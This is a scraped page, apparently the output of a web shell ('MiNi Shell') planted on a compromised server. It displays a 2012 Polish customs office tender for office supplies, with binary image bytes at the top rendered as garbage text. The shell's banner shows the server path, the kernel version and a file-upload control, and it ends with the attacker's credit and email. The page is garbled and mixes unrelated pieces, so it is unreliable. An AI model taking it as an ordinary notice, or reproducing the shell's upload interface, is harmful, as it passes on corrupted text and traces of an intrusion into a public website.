JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120530/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120530/179388-N-2012.html

<p class="kh_header"><b>Katowice: Zakup wraz z dostawą materiałów biurowych.</b><br>
<b>Numer ogłoszenia: 179388 - 2012; data zamieszczenia: 30.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna w Katowicach , ul. Słoneczna 34, 40-136 Katowice, woj. śląskie, tel. 32 3587161, faks 32 3587204.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.ic.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wraz z dostawą materiałów biurowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> segregator A-4 z mechanizmem dźwigniowym, karton o grubości co najmniej 2 mm  z zewnętrznej strony pokryty folią PP, strona wewnętrzna papier, na grzbiecie kieszeń z folii z dwustronną  etykietą. Otwory na przedniej okładce zabezpieczające otwarcie. Otwór na grzbiecie , szerokość grzbietu 7-8 cm. Kolor  ciemno zielony, czarny , granatowy .	500 szt.karton archiwizacyjny pełny (nie ścięty), na zawartość segregatora formatu A4, wykonany ze sztywnego kartonu, o wymiarach minimalnych: 340 x 95 x 265 mm, zawierający miejsce do opisu zawartości oraz otwory ułatwiające wyjmowanie i przenoszenie kartonu - 3 000 szt.teczka zawieszkowa (oczkowa), tekturowa, na dokumenty formatu A4, z wąsem metalowym, (pełna okładka) z zaznaczonym/oznaczonym polem na opis teczki,  ze wzmocnieniem na całej długości teczki mechanizmu skoroszytowego	2 000 szt.
teczka kartonowa z gumką, na dokumenty formatu A4, posiadająca trzy wewnętrzne klapy o szer. min 75 mm,  zabezpieczające dokument przed wypadnięciem (w kolorze zielonym)	100 szt.
skoroszyt plastikowy miękki A-4 kolorowa tylna okładka, przednia przeźroczysta, biały wyciągany pasek pozwalający opisać zawartość (zielona lub czarna) 	100 szt.
koperta DL, samoklejąca, biała,  (opakowanie po 1000 szt.)	70 opakowań
koperta B-4, z rozszerzanymi bokami i dnem (na dużą ilość akt), samoklejąca, biała lub brązowa,  bez okna, o gramaturze min. 120 g/m2  (opakowanie po  250 szt.)	40 opakowań
taśma pakowa, brązowa, o minimalnych wymiarach  48 mm x 46 m, wytrzymała na zrywanie, przeznaczona do (zawijarki)	500 szt.
zeszyt A-4, w kratkę, w sztywnej oprawie,  kartki zszywane (min.96 kart.)	150 szt.
zszywacz biurowy:
- część mechaniczna wykonana z metalu,
- zszywający min.50 kartek (papieru 80g/m2)
- zszywający zszywkami 24/6	50 szt.
zszywacz biurowy:
- część mechaniczna wykonana z metalu,
- zszywający do 50 kartek (papieru 80g/m2)
- zszywający zszywkami 24/6	200 szt.
taśma klejąca przezroczysta, o wym. min. 18 mm  x  min. 30 m	500 szt.
karteczki samoprzylepne o wymiarach:  min.75 mm x min. 75 mm, liczba arkuszy w bloczku min. 100,	500 bloczków
karteczki samoprzylepne o wymiarach:  min.50 mm x min. 50 mm, liczba arkuszy w bloczku min. 100,	500 bloczków
wąsy do skoroszytów, wykonane z polipropylenu, w opakowaniu po 25 szt.	1600 opakowań
marker permanentny, uniwersalny, do użytku biurowego, z końcówką okrągłą o grubości od 1,5 do 3,00 mm, wkład w kolorze czarnym	200 szt.
cienkopisy wkład w kolorze czerwonym, czarnym, zielonym, niebieskim  
(w opakowaniu 4 szt. - po 1 szt. z każdego koloru)	200 opakowań
klej w sztyfcie  (wielkość: min.:  40 g) do klejenia papieru	500 szt.
nożyczki, ostrza wykonane ze stali nierdzewnej, rączka ergonomiczna z odpornego na pęknięcia tworzywa, ostrza o długości min. 7 cm - max. 9 cm	150 szt.
szybkoschnący korektor na bazie wody, o pojemności min.: 20 ml	200 szt.
naklejka na segregator, o szerokości 7 cm, długości min. 15 cm, opakowanie po min. 10 szt.	1000 opakowań
linijka wykonana z przezroczystego plastiku, o długości 30 cm	50 szt.
długopis z wymiennym wkładem, z końcówką max. 0,5 mm, wkład w kolorze czarnym lub granatowym, z mechanizmem chowania wkładu, gumowym uchwytem, z częściowo przeźroczystą obudową umożliwiającą kontrolę zużycia tuszu  + 1 (jeden) dodatkowy wkład do każdego  długopisu	1 240 szt.
worki strunowe - wys.min.400 mm  (opakowanie 100 szt.)	10 opakowań
plomby ołowiane śr. 10	200 kg
ołówek biurowy HB	500 szt.
gumka do ołówka, nie brudząca i  nie naruszająca struktury papieru	100 szt.
temperówka metalowa do ostrzenia kredek i ołówków standardowych, z możliwością regeneracji ostrza 	50 szt.
teczka do podpisu na dokumenty formatu A-4, wykonana z kartonu i pokryta folią polipropylenową lub skóropodobnym tworzywem, grzbiet harmonijkowy (rozciągliwy), zawierająca min. 15  przekładek 	150 szt.
kalkulator o następujących parametrach technicznych: min. 10 pozycyjny wyświetlacz o regulowanym kącie nachylenia, wymiary wyświetlacza: min. 15 mm x 80 mm, wymiary kalkulatora min.140 mm x 95 mm,  pamięć, klawisz podwójnego zera,  klawisz zmiany znaku +/-, separator części tysięcznych, korekta/cofanie ostatniego znaku, ustawianie ilości miejsc po przecinku, podwójne zasilanie,	50 szt.
koperta na płyty CD DVD	3 800 szt.
cienkopis niezmywalny do pisania po prawie wszystkich powierzchniach tj. folia, szkło, klisze, fotograficzne, plastik - kolor czarny 	50 szt.
rozszywacz metalowy, z uchwytem plastikowym, pozwalający na łatwe usuwanie wszystkich rodzajów zszywek z dokumentów	100 szt.
zakreślacz fluorescencyjny,  o grubości zakreślania od 1-5mm
(w opakowaniu - kpl. po 4 różne kolory, w tym:  żółty i zielony),	150 kpl.
folia stretch, grubość 23 microny, o wymiarach 200m x 500mm, waga netto min.: 1,5 kg.	50 rolek
obwoluta A4  (koszulka)(opakowanie po 100 szt.) z możliwością wpięcia do segregatorów	500 opakowań
dziurkacz biurowy, wykonany z blachy stalowej, na 2 dziurki:
- dziurkujący min. 50 kartek,
- antypoślizgowa podkładka nie rysująca mebli,
- z ogranicznikiem formatu min. A4 i A5,	30 szt.
dziurkacz biurowy, wykonany z blachy stalowej, na 2 dziurki:
- dziurkujący do 50 kartek,
- antypoślizgowa podkładka nie rysująca mebli,
- z ogranicznikiem formatu min. A4 i A5,	
130 szt.
tusz wodny do stempli z gumową i polimerową płytką stemplującą w kolorze zielonym, o pojemności min. 25 ml, z końcówką ułatwiającą nasączanie  poduszek oraz nakrętką w kolorze tuszu.	200 szt.
poduszka do stempli - pieczęci metalowych, sucha, o średnicy min 90 mm max 110 mm o wysokiej jakości i wytrzymałości. Obudowa z przykrywką, wkład wielowarstwowy, przeciwślizgowy	20 szt.
poduszka do stempli, sucha, o wymiarach min.7cm x  min.11 cm	100 szt.
klips do spinania dokumentów - dwuczęściowy plastikowy klips przeznaczony do archiwizacji dokumentów (opakowanie po 100 szt.)  	50 opakowań
klips biurowy odporny na odkształcenie w czterech rozmiarach po 250 szt. (np. o wym. 25 mm - 250 szt., o wym.32 mm - 250 szt., o wym. 41mm - 250 szt., o wym. 51 mm - 250 szt.)	700 szt.
spinacze biurowe  25 mm (min. 100 szt. w opakowaniu)	600 opakowań
zszywki  o wymiarze 24/6 (min. 1000 szt. w opakowaniu)	600 opakowań
rolki do maszyn liczących, kasowe offsetowe o wym. 57 mm x 30 mb.	200 szt.
planszeta, wyposażona w sprężysty mechanizm  zaciskowy, formatu A4	100 szt.
gumki recepturki o średnicy 80 mm - 150 mm, grubość: 1 mm - 1, 5 mm  	3 kg
plastelina nie brudząca, opakowanie min. 6 szt.	20 opakowań
sznurek  dratwa nabłyszczana  min. a 10 dag 	200 szt.
szuflada na dokumenty, trwały plastik, nadająca się do układania w stosy, odporna na pękanie, format A-4,  wyprofilowany, wycięty spód ułatwia wyjmowanie dokumentów, kolor  przeźroczysty 	50 szt.
papier pakunkowy szary, o wym. min . 1200mmx1000mm	200 arkuszy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.60.00.00-6, 22.80.00.00-8, 22.81.50.00-6, 44.61.71.00-9, 22.81.63.00-6, 22.85.00.00-3, 24.91.00.00-6, 30.19.21.25-3, 30.19.73.20-5, 30.19.71.00-7, 30.14.11.00-0, 30.19.21.21-5, 30.19.92.30-1, 30.19.00.00-7, 30.19.11.30-4, 30.19.21.00-2, 30.19.21.33-2, 30.19.32.00-0, 30.19.72.20-4, 30.19.73.20-5, 30.19.95.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie pobiera się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli upoważnienie do podpisywania oferty nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub potwierdzonej kserokopii</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące możliwości dokonania zmian postanowień zawartej umowy:
1)	zmiany wartości umowy - w przypadku zwiększenia bądź zmniejszenia stawek podatku od towarów i usług, podatku akcyzowego, cła na podstawie odrębnych przepisów, które wejdą w życie po dniu zawarcia Umowy, a przed wykonaniem przez Wykonawcę obowiązku po wykonaniu, którego Wykonawca jest uprawniony do uzyskania wynagrodzenia, wynagrodzenie Wykonawcy może ulec odpowiedniemu zwiększeniu bądź zmniejszeniu, jeżeli w wyniku zastosowania zmienionych stawek podatków ulega zmianie kwota należnego podatku oraz wynagrodzenie Wykonawcy uwzględniające podatek od towarów i usług, podatek akcyzowy cło.
2)	zmiany umówionego terminu wykonania zamówienia - z powodu działań osób trzecich uniemożliwiających wykonanie zamówienia, które to działania nie są konsekwencją winy którejkolwiek ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.katowice.ic.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego - Izba Celna w Katowicach, 40-136 Katowice, ul. Słoneczna 34, pok. 124 (I pietro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2012 godzina 10:00, miejsce: siedziba Zamawiajacego - Izba Celna w Katowicach, 40-136 Katowice, ul. Słoneczna 34, Biuro Podawcze, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com